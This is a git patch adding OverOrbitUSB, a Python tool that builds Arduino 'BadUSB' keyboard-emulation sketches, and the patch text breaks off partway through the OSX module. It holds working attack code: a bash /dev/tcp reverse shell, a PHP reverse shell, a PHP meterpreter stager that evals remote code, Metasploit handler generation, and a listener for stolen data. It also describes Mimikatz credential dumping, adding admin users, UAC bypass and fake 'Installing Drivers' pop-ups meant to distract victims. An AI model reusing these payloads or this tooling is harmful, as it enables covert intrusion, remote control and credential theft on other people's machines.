From 03160f37c47a6a28d4950a8b1680b6a0bb79b3a7 Mon Sep 17 00:00:00 2001 From: ChandraOrbit <31229540+ChandraOrbit@users.noreply.github.com> Date: Tue, 22 Aug 2017 09:22:00 +0700 Subject: [PATCH] Add files via upload --- OverOrbitUSB.py | 50 ++ Petunjuk.md | 47 ++ coreUtils.py | 126 ++++ helperCore.py | 194 ++++++ nfoCore.py | 230 +++++++ nixCore.py | 367 ++++++++++++ osxCore.py | 366 ++++++++++++ winCore.py | 1512 +++++++++++++++++++++++++++++++++++++++++++++++ 8 files changed, 2892 insertions(+) create mode 100644 OverOrbitUSB.py create mode 100644 Petunjuk.md create mode 100644 coreUtils.py create mode 100644 helperCore.py create mode 100644 nfoCore.py create mode 100644 nixCore.py create mode 100644 osxCore.py create mode 100644 winCore.py diff --git a/OverOrbitUSB.py b/OverOrbitUSB.py new file mode 100644 index 0000000..3933b01 --- /dev/null +++ b/OverOrbitUSB.py @@ -0,0 +1,50 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils +import winCore +import nixCore +import osxCore +import helperCore +import nfoCore + +def mainMenu(): + + menu = {} + menu['0']="Info" + menu['1']="Windows Payloads" + menu['2']="OSX Payloads" + menu['3']="Linux Payloads" + menu['4']="Helper/Listener Functions" + menu['99']="Exit" + + while True: + coreUtils.bannerMain() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + winCore.WinMenu() + elif selection == '2': + osxCore.osxMenu() + elif selection == '3': + nixCore.LinuxMenu() + elif selection == '4': + helperCore.helperMenu() + elif selection == '0': + nfoCore.generalInfo() + elif selection == '99': + break + else: + print "\n\n***That is not a valid option!***\n\n" + + +if __name__ == "__main__": + mainMenu() diff --git a/Petunjuk.md b/Petunjuk.md new file mode 100644 index 0000000..6b921f6 --- /dev/null +++ b/Petunjuk.md @@ -0,0 +1,47 @@ +# OverOrbitUSB +"I am an ordinary human who tries to see from the glasses of universality." -Chandra Orbit. + +###General Info +OverOrbitUSB is a tool to generate sketches for Arduinos when used as an HID Attack. It was designed around devices with the ATMEGA32U4 chip, like the CJMCU-BEETLE, or the new LilyGo "BadUSB" devices popping up on ebay and aliexpress that look like USB sticks but contain an Arduino. I wrote this because the few other tools out there that do similar don't have as many customization options like the UAC Bypass options or the notification bubble options. I wanted to create something that could quickly generate a custom payload and that did not require anything extra to be install beyond the standard Python libraries and the Arduino IDE. I also wrote this to get better at Python. This is my first release of anything, so expect problems. + +###Requirements +- An Arduino that supports keyboard emulation +- Python 2.7 (Python 3 version in the process) +- Arduino IDE: https://www.arduino.cc/en/Main/Software +- NicoHood's HID: https://github.com/NicoHood/HID/ (This can be installed straight from the Arduino IDE from the menu: Sketch->.Include Library->manage Libraries and search for "HID-Project") + +###Use +1. start by launching OverOrbitUSB.py +2. Select the target's OS +3. Select the specific payload +4. Fill in the required settings +5. Generate the .ino file +6. Open the .ino file in the Arduino IDE +7. Flash the sketch to your Arduino device + +###Notes + +1. After flashing the payload, the Arduino IDE will disconnect the Arduino, then it will automatically reconnect, and deliver the payload. Be ready for characters to suddenly be typed to the screen; I recommend having notepad or similar open and focused when you flash the sketch +2. OverOrbitUSB currently drops the .ino file and the Metasploit .rc file in the working directory, so look for them there. +3. For the UAC Bypass techniques, timing is key. Older devices will open the Terminal with Admin rights at a slower speed, and therefore you may need to adjust the delay() in the BypassUAC functions in the sketch +4. This is just the beginning. Many more payloads, features, options and additions are coming. +5. Please contribute if you have something to add. + +##Disclaimer +Don't do anything illegal with this. +Usage of OverOrbitUSB for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, provincial/state and federal laws. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. + +"Don't be mean; we don't have to be mean, cuz, remember, no matter where you go, there you are." - Buckaroo Banzai + +##About me +You can find me on : www.orbitsolusi.com + +##Thanks +Thank you to my beautiful wife for putting up with my late nights while I worked on this, and her fantastic support she has always given me. + +###CHANGELOG + +v0.1 +- Added new payload that grabs the username and computername and sends it to a listener +- customization options to the notification bubble. +- Initial commit diff --git a/coreUtils.py b/coreUtils.py new file mode 100644 index 0000000..cf58d55 --- /dev/null +++ b/coreUtils.py @@ -0,0 +1,126 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import socket + +def bannerMain(): + + clearScreen() + banner = " ****************************************************************************\n" + banner += " * d8b d8 d8b *\n" + banner += " * 888 8P8 d8P 888 *\n" + banner += " * 88b d888888P 88b *\n" + banner += " * d8888b 88bd88b 888888b 88b 888 888 d8P d888b 888888b *\n" + banner += " * d8P 888 88P 88P 88b 88P 88P d88 88 88b 88P 88b *\n" + banner += " * 88b d88 d88 d88 d88 d88 88b 888 d88 88b d88 d88 *\n" + banner += " * 88888P d88 d888888P d88 88b 888P 88b 8888P d888888P *\n" + banner += " * *\n" + banner += " * ORBIT SOLUTIONS *\n" + banner += " * www.orbitsolusi.com *\n" + banner += " * *\n" + banner += " ****************************************************************************\n" + banner += "\n" + banner += " \"CREATE EXPLOIT UNTUK HACKING VIA USB\"" + banner += "\n" + print banner + +def clear(): + + os.system('clear') + +def clearScreen(): + + if sys.platform == "linux" or sys.platform == "linux2" or sys.platform == "darwin": + clear() + elif sys.platform == "win32": + cls() + +def cls(): + os.system('cls') + +def msfRCfile(IP,port,payload, fileName): + + buffer = "use exploit/multi/handler\n" + buffer += "set PAYLOAD " + payload + "\n" + buffer += "set LHOST " + IP + "\n" + buffer += "set LPORT " + port + "\n" + buffer += "set ExitOnSession false\n" + buffer += "set autorunscript migrate -f\n" + buffer += "exploit -j -z\n" + + fileName = checkRC(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + + print "\n\nWrote Metasploit file " + fileName + +def checkIP(IPaddress): + try: + socket.inet_aton(IPaddress) + return True + except socket.error: + return False + +def FileCheck(fileName): + if os.path.exists(fileName): + overwrite = raw_input ("File " + fileName+ " already exists. Overwrite? Y/N: ") + if overwrite not in ('Y','y','yes','Yes','YES'): + return True + else: + return False + else: + return False + +def checkINO(fileName): + if not fileName.endswith('.ino'): + fileName = fileName + ".ino" + return fileName + +def checkRC(fileName): + if not fileName.endswith('.rc'): + fileName = fileName + ".rc" + return fileName + + +def getFileName(defaultFileName): + + fileExists = True + while fileExists == True: + fileName = raw_input("Please enter the name of the output file (if left blank the default \""+defaultFileName+"\"): ") + if fileName == "": + fileName = defaultFileName + fileExists = FileCheck(fileName) + fileName = checkINO(fileName) + return fileName + +def getRCFileName(defaultFileName): + + fileExists = True + while fileExists == True: + fileName = raw_input("Please enter the name of the Metasploit RC file (if left blank the default \""+defaultFileName+"\"): ") + if fileName == "": + fileName = defaultFileName + fileExists = FileCheck(fileName) + fileName = checkRC(fileName) + return fileName + + +def getBinary(URL): + binary = URL.split("/")[-1] + return binary + +def checkQuotes(string): + + if string.startswith('-enc') or string.startswith('-Enc'): + string = string.replace('"','') + elif string.startswith('"') and string.endswith('"'): + string = string.replace('"','\\\"') + else: + string = '\\\"' + string + '\\\"' + return string + diff --git a/helperCore.py b/helperCore.py new file mode 100644 index 0000000..62fa8bd --- /dev/null +++ b/helperCore.py @@ -0,0 +1,194 @@ +import coreUtils +import socket +import os +def HelperBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Helper Function *" + print "* These options open up various listeners for the payloads *" + print "* *" + print "********************************************************************************************" + print "\n" + + +def helperMenu(): + + menu = {} + menu['1']="Invoke-Mimikatz/Add Admin/UserName and PCname Listener" + menu['42']="Main Menu" + menu['99']= "Exit" + + while True: + HelperBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + helperOption1() + elif selection == '2': + helperOption2() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def printData(IPaddy,input, listener): + + i=1 + baseFileName = IPaddy + listener + fileName = baseFileName + ".txt" + while os.path.exists(fileName): + fileName = baseFileName +"("+str(i)+").txt" + i += 1 + + file = open(fileName,'w') + file.write(input) + file.close() + print "File " + fileName + " written\n" + +def listenerMode(): + + listener="" + + while True: + + coreUtils.clearScreen() + print "This menu will let you select which mode the listener will be on" + print "This option will decide the naming convention for the ouput files" + print "Please select 1 or 2, then select to return to the previous menu" + print "\n" + + menu = {} + menu['1'] = "Set listener to Mimikatz" + menu['2'] = "Set listener to Add Admin" + menu['3'] = "Set listener to UserName and Computer Name" + menu['42'] = "Back to previous menu" + menu['99'] = "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + + selection = raw_input("Please select a mode: ") + if selection == '1': + listener = "MimiKatz" + elif selection == '2': + listener = "addAdmin" + elif selection == '3': + listener = "userPCname" + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + + return listener + +def helperOption1(): + + done = False + looper = False + port="" + listener="" + + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Listner *" + print "* This helper listens on a specific port and write the relevant data to a file *" + print "* Options are: 1.Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['1'] = "Set the listening port" + menu['2'] = "Set listener to mimikatz, Admin or User and PC Name mode" + menu['3'] = "Start the listener" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if port != "": + print "Listening port this server set to -> " + port + if listener !="": + print "Listner Mode set to " + listener + " mode" + + selection=raw_input("\nPlease Select: ") + + if selection == '1': + port = raw_input("Please enter the listening port on this server: ") + elif selection == '2': + listener = listenerMode() + elif selection == '3': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + + if port != "" and listener != "": + done = True + + if listener == 'MimiKatz': + fileExtention = '-mimiKatz' + elif listener == 'addAdmin': + fileExtention = '-addAdmin' + elif listener == 'userPCname': + fileExtention = '-userPCname' + + if done == True and looper == True: + + port = int(port) + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_address = ('', port) + sock.bind(server_address) + sock.listen(1) + while True: + try: + print "Listening for a connection..." + connection, client_address = sock.accept() + print 'connection from', client_address[0] + data = connection.recv(4096) + if not data: + print "no data from " , client_address[0] + connection.close() + break + else: + printData(client_address[0],data, fileExtention) + except KeyboardInterrupt: + if connection: + connection.close() + break + finally: + # Clean up the connection + connection.close() diff --git a/nfoCore.py b/nfoCore.py new file mode 100644 index 0000000..0707b6b --- /dev/null +++ b/nfoCore.py @@ -0,0 +1,230 @@ +import coreUtils + +def Win1info(): + print "\n\n" + print "This payload will download a windows binary and execute it" + print "You are required to specify the full URL of the binary to be downloaded, including the file name" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "Example URL input: http://192.168.1.111/badBinary.exe" + print "\n" + print "Depending on which UAC Bypass technique you use, the binary will be dropped in:" + print "1. The user's home folder" + print "2. \\Windows\\System32 is you use the visiable UAC Bypass technique" + print "3. \\Windows\\System32\\WindowsPowershell\\v1.0" + print "\n" + print "It is up to you to make sure it will get past AV, and to clean up after" + print "\n" + raw_input("Please press Enter to return to the previous screen") + + +def Win2info(): + print "\n\n" + print "This payload will download a powershell script and execute it" + print "\n" + print "You are required to specify the URL of the powershell to be downloaded, including the powershell script name" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "Example URL input: http://192.168.1.111/maliciousPS.ps1" + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win3info(): + print "\n\n" + print "This payload will execute a powershell script that you provide" + print "\n" + print "You are required provide the powershell script contents, the payload will execute" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "the payload will automatically add \"powershell -nop -w hidden\"" + print "If you script is fully encoded (like Empire), please start it with -enc so it doesn't get wrapped with \" \" " + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win4info(): + print "\n\n" + print "This payload will type out a powershell script and execute it, creating a remote TCP Powershell prompt" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win5info(): + print "\n\n" + print "This payload will add a User, add it to the Admin group, and add it to the RDP group" + print "\n" + print "You are required to provide the username and password, and optional IP and port" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "This payload will optionally send the username and password to a listener (future feature*) " + print "if you plan on attacking multiple machines" + print "\n" + print "***This payload does require Admin rights***" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win6info(): + print "\n\n" + print "This payload will download Invote-Mimikatz.ps1 (by default from github) and execute it, then send the results to a listening server" + print "\n" + print "You are required to provide theIP address and port the output will be sent to" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "***This payload does require Admin rights***" + print "Invoke-Mimikatz.ps1 will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win7info(): + print "\n\n" + print "This payload will add and entry to the host file in Windows" + print "\n" + print "You are required to provide the name and IP address to be entered into the host file" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "***This payload does require Admin rights***" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win8info(): + print "\n\n" + print "This payload will download a file and place it on the current user's Desktop" + print "\n" + print "You are required to specify the full URL of the file to be downloaded, including the file name" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "Example URL input: http://192.168.1.111/SecretHrData.doc" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win9info(): + print "\n\n" + print "This payload will type out a powershell script and execute it, creating a remote TCP CMD prompt" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win10info(): + print "\n\n" + print "This payload will type out a powershell script and execute it, creating reverse/meterpreter/https connection" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def Win11info(): + print "\n\n" + print "This payload will get the current user and computername and send it to a remote listener" + print "\n" + print "You are required to provide IP address and port the payload will send data back to" + print "As well as the other standard payload options (UACBypass, notification bubble, etc)" + print "\n" + print "The powershell script will run from memory" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def UACBypassInfo(): + print "\n\n" + print "Option 2. UAC Bypass technique will download FuzzySecurity's bypass technique from github, and run it" + print "by default with the \"-Method ucmDismMethod\" argument, opening a Powershell prompt with Admin rights" + print "There is no popup, but network lag affects how long the prompt takes to appear, and drops the file" + print "\"dismcore.dll\" into the Windows\System32 folder" + print "\n" + print "Option 3. UAC Bypass technique will start a CMD Prompt from the Run Dialogue box with the RunAs argument" + print "After a delay, it will press Alt-Y to select Yes from Yes/No dialogue box that appears" + print "***This may get the user's attention***" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def bubbleInfo(): + print "\n\n" + print "This option adds a notification bubble to popup from the system tray to distract the user" + print "by default the Title is \"Installing Drivers\" and the message is \"Please do not remove the device\"" + print "\n" + raw_input("Please press Enter to return to the previous screen") + print "\n" + +def osx1info(): + print "\n\n" + print "This payload will create a reverse TCP shell using netcat without the -e flag" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + print "This payload will run until the process is killed, so it will repeatedly attempt to connect to the IP you provide" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def osx2info(): + print "\n\n" + print "This payload will create a reverse TCP shell using PHP" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def osx3info(): + print "\n\n" + print "This payload will create a reverse TCP meterpreter in PHP" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def nix1info(): + print "\n\n" + print "This payload will create a reverse TCP shell using netcat without the -e flag" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + print "This payload will run until the process is killed, so it will repeatedly attempt to connect to the IP you provide" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def nix2info(): + print "\n\n" + print "This payload will create a reverse TCP shell using PHP" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + raw_input("Please press Enter to return to the previous screen") + +def nix3info(): + print "\n\n" + print "This payload will create a reverse TCP meterpreter in PHP" + print "\n" + print "You are required to provide IP address and port the payload will connect back to" + print "\n" + print "\n" + raw_input("Please press Enter to return to the previous screen") + + + +def generalInfo(): + coreUtils.clearScreen() + print "\n\n" + print "GENERAL" + print "OrbitUSB is designed to facilitate creating Arduino sketches for devices with the AtMega32U4 chipset" + print "That can do keyboard emulation. Once plugged into a system, the malicious device will type out the contents" + print "of the selected payload, which include download and execute binaries, custom powershell execution and more" + print "Options include notification bubbles from system tray to distract users as well as UAC Bypass techniques" + print "to get CMD prompts with elevated priveleges" + print "\nREQUIREMENTS" + print "This tool requires the HID-Project library for all Windows payloads" + print "Which can be installed within the Arduino IDE: Sketch->.Include Library->manage Libraries and search for \"HID-Project\"" + print "\nABOUT ME" + print "You can find me on www.orbitsolusi.com" + print "and on github at https://github.com/OrbitUSB" + print "Thanks to: mywife for...alot" + print "\n" + raw_input("Please press Enter to return to the previous screen") diff --git a/nixCore.py b/nixCore.py new file mode 100644 index 0000000..3d30bc8 --- /dev/null +++ b/nixCore.py @@ -0,0 +1,367 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils + +def nixBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* Linux Payloads *" + print "* These Payloads are made for linux, it's up to you to get a terminal open *" + print "* *" + print "********************************************************************************************" + print "\n" + +def LinuxMenu(): + + coreUtils.clearScreen() + menu = {} + menu['1']="Bash Reverse Shell without nc -e for Linux" + menu['2']="Reverse Shell in PHP for Linux" + menu['3']="meterpreter/reverse in PHP for Linux" + menu['42']="Main Menu" + menu['99']="Exit" + + while True: + nixBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + nixOption1() + elif selection == '2': + nixOption2() + elif selection == '3': + nixOption3() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def nixWriteFile(fileName,payloadFunc,payload): + + buffer = "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " hurryUp();\n" + buffer += " killCaps();\n" + buffer += " delay(3000);\n" + + buffer += " " + payloadFunc + + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void hurryUp(){\n" + buffer += " boolean areWeThereYet = capsCheck();\n" + buffer += " while (areWeThereYet == capsCheck()){\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += " hitCaps();\n" + buffer += "}\n" + buffer += "\n" + + buffer += "boolean capsCheck(){\n" + buffer += " if (BootKeyboard.getLeds() & LED_CAPS_LOCK){\n" + buffer += " return true;\n" + buffer += " }\n" + buffer += " else{\n" + buffer += " return false;\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void hitCaps(){\n" + buffer += " Keyboard.press(KEY_CAPS_LOCK);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_CAPS_LOCK);\n" + buffer += "}\n" + buffer += "\n" + + buffer += "void killCaps(){\n" + buffer += " if (capsCheck())\n" + buffer += " {\n" + buffer += " hitCaps();\n" + buffer += " }\n" + buffer += "}\n" + buffer += "\n" + + buffer += payload + + buffer += "void loop()\n" + buffer += "{\n" + buffer += "}\n" + + fileName = coreUtils.checkINO(fileName) + file = open(fileName,'w') + file.write(buffer) + file.close() + +def NixOption1(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* Bash Reverse Shell without NetCat *" + print "* This payload will initiate a Bash reverse shell without Netcat *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('reverseCMD.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix1info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"nohup bash -c \\\"while true;do bash -i >& /dev/tcp/" +remoteIP+ "/" +remotePort+ " 0>&1 2>&1; sleep 1;done\\\" 1>/dev/null &\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + +def nixOption2(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Reverse Shell *" + print "* This payload will initiate a reverse shell via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + fileName = coreUtils.getFileName('revShellPHP.ino') + elif selection == '4': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix2info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "": + done = True + + if done == True and looper == True: + + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r '$sock=fsockopen(\\\""+remoteIP+"\\\","+remotePort+");exec(\\\"/bin/sh -i <&3 >&3 2>&3\\\");'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + +def nixOption3(): + + done = False + looper = False + remoteIP="" + remotePort="" + fileName="" + RCfile="" + + while looper != True: + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* PHP Meterpreter Reverse TCP *" + print "* This payload will initiate a meterpreter/reverse_tcp via PHP, requires PHP *" + print "* Options are: 1. remote IP 2. Listening Port *" + print "* *" + print "********************************************************************************************" + print "\n" + + menu = {} + menu['0'] = "Info" + menu['1'] = "Set IP address of the remote server" + menu['2'] = "Set the listening port of the remote server" + menu['3'] = "Set Arduino sketch filename" + menu['4'] = "Set Metasploit RC File name" + menu['5'] = "Write Arduino sketch" + menu['42']= "Return to previous menu" + menu['99']= "Exit" + + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + print "\n\n" + if remoteIP != "": + print "IP of the remote server set to -> " + remoteIP + if remotePort != "": + print "Listening port on the remote server set to -> " + remotePort + if RCfile != "": + print "Metasploit RC File name set to -> " + RCfile + if fileName != "": + print "Arduino filename set to -> " + fileName + + selection=raw_input("\nPlease Select: ") + + if selection =='1': + remoteIP = raw_input("Please enter the IP address of the remote server to connect to: ") + elif selection == '2': + remotePort = raw_input("Please enter the listening port on the remote server:") + elif selection == '3': + RCfile = coreUtils.getRCFileName('reverseMetPHP.rc') + elif selection == '4': + fileName = coreUtils.getFileName('reverseMetPHP.ino') + elif selection == '5': + if done == False: + print "\nYou have not set all the options" + raw_input("Press Enter to return to the menu and set all the options") + else: + looper = True + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + elif selection == '0': + nfoCore.nix3info() + else: + print "\n\n***That is not a valid option!***\n\n" + + if remoteIP != "" and remotePort != "" and fileName != "" and RCfile !="": + done = True + + if done == True and looper == True: + payload = "void ReverseShell(){\n" + payload += "Keyboard.println(\"php -r 'error_reporting(0); $ip = \\\""+remoteIP+"\\\"; $port = "+remotePort+"; if (($f = \\\"stream_socket_client\\\") && is_callable($f)) { $s = $f(\\\"tcp://{$ip}:{$port}\\\");" + payload += " $s_type = \\\"stream\\\"; } elseif (($f = \\\"fsockopen\\\") && is_callable($f)) { $s = $f($ip, $port); $s_type = \\\"stream\\\"; } elseif (($f = \\\"socket_create\\\") && is_callable($f))" + payload += " { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = \\\"socket\\\"; } else { die(\\\"no socket funcs\\\"); } if (!$s) { die(\\\"no socket\\\");" + payload += " } switch ($s_type) { case \\\"stream\\\": $len = fread($s, 4); break; case \\\"socket\\\": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(\\\"Nlen\\\", $len); $len = $a[\\\"len\\\"];" + payload += " $b = \\\"\\\"; while (strlen($b) < $len) { switch ($s_type) { case \\\"stream\\\": $b .= fread($s, $len-strlen($b)); break; case \\\"socket\\\": $b .= socket_read($s, $len-strlen($b)); break;" + payload += " } } $GLOBALS[\\\"msgsock\\\"] = $s; $GLOBALS[\\\"msgsock_type\\\"] = $s_type; eval($b); die();'\");\n" + payload += " pressEnter();\n" + payload += "}\n" + + payloadFunc = "ReverseShell();\n" + + nixWriteFile(fileName,payloadFunc, payload) + coreUtils.msfRCfile(remoteIP,remotePort,'php/meterpreter/reverse_tcp',RCfile) diff --git a/osxCore.py b/osxCore.py new file mode 100644 index 0000000..409a632 --- /dev/null +++ b/osxCore.py @@ -0,0 +1,366 @@ +#!/usr/bin/python +#uses HID-Project.h from https://github.com/NicoHood/HID, can be installed from Arduino Library Manager + +import sys +import argparse +import os +import subprocess +import coreUtils +import nfoCore + +def osxBanner(): + + coreUtils.clearScreen() + print "********************************************************************************************" + print "* *" + print "* *" + print "* OSX Payloads *" + print "* These Payloads are for OSX *" + print "* *" + print "********************************************************************************************" + print "\n" + +def osxMenu(): + + coreUtils.clearScreen() + menu = {} + menu['1']="Bash Reverse Shell without nc -e for OSX" + menu['2']="Reverse Shell in PHP for OSX" + menu['3']="meterpreter/reverse in PHP for OSX" + menu['42']="Main Menu" + menu['99']="Exit" + + while True: + osxBanner() + options=menu.keys() + options.sort(key=int) + for entry in options: + print entry, menu[entry] + + selection=raw_input("\nPlease Select: ") + if selection =='1': + osxOption1() + elif selection == '2': + osxOption2() + elif selection == '3': + osxOption3() + elif selection == '42': + coreUtils.clearScreen() + break + elif selection == '99': + exit() + else: + print "\n\n***That is not a valid option!***\n\n" + +def osxWriteFile(fileName,payloadFunc,payload): + + buffer = "#include \n" + buffer += "void setup() {\n" + buffer += " Keyboard.begin();\n" + buffer += " openTerminal();\n" + buffer += " delay(1500);\n" + + buffer += " " + payloadFunc + buffer += " closeTerminal();\n" + buffer += " Keyboard.end();\n" + buffer += "}\n" + + buffer += "void pressEnter(){\n" + buffer += " Keyboard.press(KEY_RETURN);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.release(KEY_RETURN);\n" + buffer += "}\n" + + buffer += "void openTerminal(){\n" + buffer += " delay(500);\n" + buffer += " Keyboard.press(KEY_LEFT_GUI);\n" + buffer += " Keyboard.println(\" \");\n" + buffer += " delay(150);\n" + buffer += " Keyboard.release(KEY_LEFT_GUI);\n" + buffer += " delay(100);\n" + buffer += " Keyboard.println(\"terminal\");\n" + buffer += " delay(100);\n" + buffer += " pressEnter();\n" + buffer += " pressEnter();\n" + buffer += " 